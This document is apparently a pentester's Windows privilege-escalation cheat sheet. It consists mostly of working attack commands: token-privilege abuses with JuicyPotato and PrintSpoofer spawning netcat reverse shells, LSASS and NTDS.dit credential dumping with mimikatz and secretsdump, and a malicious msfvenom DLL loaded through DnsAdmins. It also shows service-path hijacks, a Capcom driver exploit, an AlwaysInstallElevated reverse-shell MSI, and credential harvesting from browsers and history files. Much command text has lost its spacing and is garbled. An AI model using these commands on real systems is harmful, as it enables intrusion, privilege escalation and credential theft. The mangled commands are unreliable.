JuicyPotato can be used to exploit the SeImpersonateor SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.
c:\\tools\\JuicyPotato.exe-l53375-pc:\\windows\\system32\\cmd.exe-a"/c c:\\tools\\nc.exe ip 8443 -e cmd.exe"-t*
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\\SYSTEMlevel access.
# start a listener on kali and run this command on windows target hostPrintSpoofer.exe-c"c:\\tools\\nc.exe ip 8443 -e cmd"
SeDebugPrivilege
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.
procdump.exe-accepteula-malsass.exelsass.dmp
we can load this in Mimikatzusing the sekurlsa::minidumpcommand. After issuing the sekurlsa::logonPasswordscommands, we gain the NTLM hash of the local administrator account logged on locally. We can use this to perform a pass-the-hash attack to move laterally if the same local administrator password is used on one or multiple additional systems
# Starting mimikatz mimikatz.exe# extracting hashes from lsass.dmp filesekurlsa::minidumplsass.dmpsekurlsa::logonpasswords
Remote Code Execution as SYSTEM
transfer this PoC script over to the target system. Next we just load the script and run it with the following syntax[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,""). Note that we must add a third blank argument "" at the end for the PoC to work properly.
# First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the user). # Next, type tasklist to get a listing of running processes and accompanying PIDs.tasklist# running poc to get system shell, or reverse shell as system.\\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
SeTakeOwnershipPrivilege
Enabling SeTakeOwnershipPrivilege - We can enable it using this script which is detailed in this blog post, as well as this one which builds on the initial concept.
# Enabling SeTakeOwnershipPrivilegeImport-Module.\Enable-Privilege.ps1.\EnableAllTokenPrivs.ps1whoami/priv# Choosing a Target FileGet-ChildItem -Path 'C:\FILE-PATH' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Checking File Ownershipcmd/cdir/q'C:\FILE-PATH'# Taking Ownership of the File# Now we can use the takeown Windows binary to change ownership of the file.takeown/f'C:\FILE-PATH'# Confirming Ownership ChangedGet-ChildItem-Path'C:\FILE-PATH'|select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}# Modifying the File ACLicacls'C:\FILE-PATH'/granteren:F
Membership of this group grants its members the SeBackupand SeRestoreprivileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). We can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
We can use this PoC to exploit the SeBackupPrivilege, and copy this file. First, let's import the libraries in a PowerShell session.
Enabling SeBackupPrivilege -Set-SeBackupPrivilege
# Importing LiberariesImport-Module.\SeBackupPrivilegeUtils.dllImport-Module.\SeBackupPrivilegeCmdLets.dll# Copying a Protected FileCopy-FileSeBackupPrivilege'C:\Confidential\Contract.txt'.\Contract.txt
Attacking a Domain Controller - Copying NTDS.dit
As the NTDS.dit file is locked by default, we can use the Windows diskshadow utility to create a shadow copy of the Cdrive and expose it as E drive. The NTDS.dit in this shadow copy won't be in use by the system.
diskshadow.exe# Copying NTDS.dit LocallyCopy-FileSeBackupPrivilegeE:\Windows\NTDS\ntds.ditC:\Tools\ntds.dit# Extracting Credentials from NTDS.dit using dsinternals or secretsdump.py# obtain the NTLM hash for just the administrator account for the domain using DSInternalsImport-Module.\DSInternals.psd1$key = Get-BootKey -SystemHivePath .\SYSTEMGet-ADDBAccount-DistinguishedName'CN=administrator,CN=users,DC=domain,DC=local'-DBPath.\ntds.dit-BootKey $key# Extracting Hashes Using SecretsDumpsecretsdump.py-ntdsntds.dit-systemSYSTEM-hasheslmhash:nthashLOCAL
Event Log Readers Group
Administrators or members of the Event Log Readers group have permission to access local system log.
Confirming Group Membership -net localgroup "Event Log Readers"
We can query Windows events from the command line using the wevtutil utility and the Get-WinEvent PowerShell cmdlet.
# Searching Security Logs Using wevtutilwevtutilqeSecurity/rd:true/f:text|Select-String"/user"# Passing Credentials to wevtutilwevtutilqeSecurity/rd:true/f:text/r:share01/u:user.name/p:Welcome1|findstr"/user"
DnsAdmins Group
DNS management is performed over RPC
ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line
When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ServerLevelPluginDll registry key is populated
When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access)
An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.
Leveraging DnsAdmins Access
# Generating Malicious DLLmsfvenom-pwindows/x64/execcmd='net group "domain admins" user /add /domain'-fdll-oadduser.dll# Starting Local HTTP Serverpython3-mhttp.server# Downloading File to TargetPSC:\> wget"http:/ip/adduser.dll"-outfile"adduser.dll"# Loading Custom DLLC:\> dnscmd.exe/config/serverlevelplugindllC:\\Users\\netadm\\Desktop\\adduser.dll
With the registry setting containing the path of our malicious plugin configured, and our payload created, the DLL will be loaded the next time the DNS service is started. Membership in the DnsAdmins group doesn't give the ability to restart the DNS service, but this is conceivably something that sysadmins might permit DNS admins to do.
# Finding User's SIDwmicuseraccountwherename="user"getsid# Checking Permissions on DNS Servicesc.exesdshowDNS# Stopping the DNS Servicescstopdns# Starting the DNS Servicescstartdns# Confirming Group Membershipnetgroup"Domain Admins"/dom
Cleaning Up
# The first step is confirming that the ServerLevelPluginDll registry key exists. Until our custom DLL is removed, we will not be able to start the DNS service again correctly.
regquery \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters# Deleting Registry Keyregdelete \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters/vServerLevelPluginDll# Starting the DNS Service Againsc.exestartdns# Checking DNS Service Statusscquerydns
Using Mimilib.dll
we could also utilize mimilib.dll from the creator of the Mimikatztool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.
Print Operators Group
We can use this tool to load the driver. The PoC enables the privilege as well as loads the driver for us.
Download it locally and edit it, pasting over the includes below.
#include <windows.h>#include <assert.h>#include <winternl.h>#include <sddl.h>#include <stdio.h>#include "tchar.h"# Compile it using cl.exe from a Visual Studio 2019 Developer Command PromptC:\Users\eren\Desktop\PrintOperators>cl/DUNICODE/D_UNICODEEnableSeLoadDriverPrivilege.cpp# Next, download the Capcom.sys driver from <https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys>, and save it to C:\\temp.
# Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.regaddHKCU\System\CurrentControlSet\CAPCOM/vImagePath/tREG_SZ/d"\??\C:\Tools\Capcom.sys"regaddHKCU\System\CurrentControlSet\CAPCOM/vType/tREG_DWORD/d1# Verify Driver is not Loaded.\DriverView.exe/stextdrivers.txtcatdrivers.txt|Select-String-patternCapcom# Verify Privilege is Enabled, Run the EnableSeLoadDriverPrivilege.exe binary.EnableSeLoadDriverPrivilege.exe# Verify Capcom Driver is Listed.\DriverView.exe/stextdrivers.txtcatdrivers.txt|Select-String-patternCapcom# Use ExploitCapcom Tool to Escalate Privileges# To exploit the Capcom.sys, we can use the ExploitCapcom tool after compiling with it Visual Studio..\ExploitCapcom.exe
Alternate Exploitation - No GUI
If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace C:\Windows\system32\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.
We would set up a listener based on the msfvenom payload we generated and hopefully receive a reverse shell connection back when executing ExploitCapcom.exe. If a reverse shell connection is blocked for some reason, we can try a bind shell or exec/add user payload.
Automating with EopLoadDriver
We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriverto load the driver. To do this, we would run the following:
# Querying the Service, checks if it starts with system privilegesscqcservice# Checking Service Permissions with PsServicec:\Tools\PsService.exesecurityservice# Checking Local Admin Group MembershipnetlocalgroupAdministrators# Modifying the Service Binary PathscconfigservicebinPath="cmd /c net localgroup Administrators server_adm /add"# Starting the servicescstartservice# Confirming Local Admin Group MembershipnetlocalgroupAdministrators# Confirming Local Admin Access on Domain Controllercrackmapexecsmbip-userver_adm-p'pass'# Retrieving NTLM Password Hashes from the Domain Controllersecretsdump.pyserver_adm@ip-just-dc-useradministrator
Weak Permissions
Permissive File System ACLs
# We can use SharpUp from the GhostPack suite of tools to check for service binaries suffering from weak ACLs..\SharpUp.exeaudit# Checking Permissions with icacls on the binaries we got in above step# Look if EVERYONE and BUILTIN\\Users groups have been granted full permissions to the directory, and therefore any unprivileged system user can manipulate the directory and its contents.
icacls"C:\Program Files (x86)\PCProtect\SecurityService.exe"<--binariypath# Replacing Service Binary, if we have start/stop privileges so that we can start a execute our reverse shell cmd/ccopy/YSecurityService.exe"C:\Program Files (x86)\PCProtect\SecurityService.exe"scstartSecurityService# Other choice would be create a admin user, if we cannot start service
Weak Service Permissions
# check the SharpUp output for any modifiable services.SharpUp.exeaudit# Checking Permissions with AccessChk-q (omit banner)-u (suppress errors)-v (verbose)-c (specify nameofaWindowsservice)-w (show onlyobjectsthathavewriteaccess).# If we have SERVIVCE_ALL_ACCESS, means we have full read/write controlaccesschk.exe/accepteula-quvcwService# Changing the Service Binary PathscconfigWindscribeServicebinpath="cmd /c net localgroup administrators <user we currently loggedin with> /add"# Stopping the ServicescstopService# Starting the SerivcescstartService# Confirming Local Admin Group Additionnetlocalgroupadministrators
Cleanup
# Reverting the Binary PathscconfigServicebinpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"# Starting the Service AgainscqueryService
Unquoted Service Path
# We can identify unquoted service binary paths using the command below.wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" | findstr /i /v ""
# Query the "dash" service and note if it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
scqcservice_name# Using accesschk.exe, note if the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
accesschk.exe/accepteula-uwdq"C:\Program Files\Unquoted Path Service\"# Copy the reverse.exe executable to this directory and rename it according to the requirements.copy C:\PrivEsc\reverse.exe "C:\ProgramFiles\UnquotedPathService\Common.exe"# Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:net start service_name
Kernel Exploits
Checking Permissions on the SAM File
icaclsc:\Windows\System32\config\SAM# get system information & copy output of sytsteminfo into systeminfo.txt filesysteminfo# windows-Exploit-Suggester # https://github.com/AonCyberLabs/Windows-Exploit-Suggester./windows-exploit-suggester.py--update./windows-exploit-suggester.py--database2014-06-06-mssb.xlsx--systeminfowin7sp1-systeminfo.txt
Performing Attack and Parsing Password Hashes
This PoC by @cube0x0 can be used to perform the entire attack, including dumping the NTLM hashes from the SAM database, directly in the console.
Vulnerable Services
# Enumerating Installed Programswmicproductgetname# Enumerating Local Portsnetstat-ano|findstr6064<--port# Enumerating Process IDget-process-Id3324<--PIDofservice# Enumerating Running Serviceget-service|?{$_.DisplayName-like'service name'}
Credential Theft
# Searching for Filesfindstr/SIM/C:"password"*.txt*.ini*.cfg*.config*.xml# Chrome Dictionary Filesgc'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt'|Select-Stringpassword# PowerShell History File# PowerShell stores command history to the file:C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt# Confirming PowerShell History Save Pathgc (Get-PSReadLineOption).HistorySavePath# Reading PowerShell History Fileforeach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Manually Searching the File System for Credentials
# Search File Contents for Stringcdc:\Users\user\Documents&findstr/SI/M"password"*.xml*.ini*.txtfindstr/sipassword*.xml*.ini*.txt*.configfindstr/spin"password"*.*# Search File Contents with PowerShellselect-string -Path C:\Users\user\Documents\*.txt -Pattern password# Search for File Extensionsdir/S/B*pass*.txt==*pass*.xml==*pass*.ini==*cred*==*vnc*==*.config*where/RC:\ *.config# Search for File Extensions Using PowerShellGet-ChildItemC:\ -Recurse-Include*.rdp,*.config,*.vnc,*.cred-ErrorActionIgnore# Sticky Notes Passwords# Notes data is stored at C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite# Viewing Sticky Notes Data Using PowerShell# Module to import <https://github.com/RamblingCookieMonster/PSSQLite> PSC:\> Set-ExecutionPolicyBypass-ScopeProcessPSC:\> cd.\\PSSQLite\\PS C:\> Import-Module.\\PSSQLite.psd1PS C:\> $db = 'C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PSC:\> Invoke-SqliteQuery-Database $db -Query"SELECT Text FROM Note"|ft-wrap# Other choice is to copy the files to attack host and search for interesting strings stringsplum.sqlite-wal# Some other files we may find credentials in include the following:%SYSTEMDRIVE%\\pagefile.sys%WINDIR%\\debug\\NetSetup.log%WINDIR%\\repair\\sam%WINDIR%\\repair\\system%WINDIR%\\repair\\software,%WINDIR%\\repair\\security%WINDIR%\\iis6.log%WINDIR%\\system32\\config\\AppEvent.Evt%WINDIR%\\system32\\config\\SecEvent.Evt%WINDIR%\\system32\\config\\default.sav%WINDIR%\\system32\\config\\security.sav%WINDIR%\\system32\\config\\software.sav%WINDIR%\\system32\\config\\system.sav%WINDIR%\\system32\\CCM\\logs\\*.log%USERPROFILE%\\ntuser.dat%USERPROFILE%\\LocalS~1\\Tempor~1\\Content.IE5\\index.dat%WINDIR%\\System32\\drivers\\etc\\hostsC:\\ProgramData\\Configs\\*C:\\ProgramFiles\\WindowsPowerShell\\*
Saved Credentials
# Listing Saved Credentialscmdkey/list# Run Commands as Another Userrunas/savecred/user:hostname\eren"COMMAND HERE"# Browser Credentials# Retrieving Saved Credentials from Chrome using sharpchrome <https://github.com/GhostPack/SharpDPAPI>.\SharpChrome.exelogins/unprotect
# Query the registry for AlwaysInstallElevated keys# Check if both keys are set to 1 (0x1)regqueryHKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer/vAlwaysInstallElevatedregqueryHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer/vAlwaysInstallElevated# on kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom msfvenom-pwindows/x64/shell_reverse_tcpLHOST=10.10.10.10LPORT=53-fmsi-oreverse.msi# Transfer the reverse.msi file using smbserver or python # Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:msiexec/quiet/qn/iC:\\PrivEsc\\reverse.msimsiexec/ic:\users\aie.msi/quiet/qn/norestart
Scheduled Tasks
# Enumerating Scheduled Tasksschtasks/query/foLIST/v# Enumerating Scheduled Tasks with PowerShellGet-ScheduledTask|select TaskName,State
User/Computer Description Field
# Checking Local User Description FieldGet-LocalUser# Enumerating Computer Description Field with Get-WmiObject CmdletGet-WmiObject-ClassWin32_OperatingSystem|select Description
Mount VHDX/VMDK
# Mount VMDK on Linuxguestmount-aSQL01-disk1.vmdk-i--ro/mnt/vmdk# Mount VHD/VHDX on Linuxguestmount--addWEBSRV10.vhdx--ro/mnt/vhdx/-m/dev/sda1# Retrieving Hashes using Secretsdump.pysecretsdump.py-samSAM-securitySECURITY-systemSYSTEMLOCAL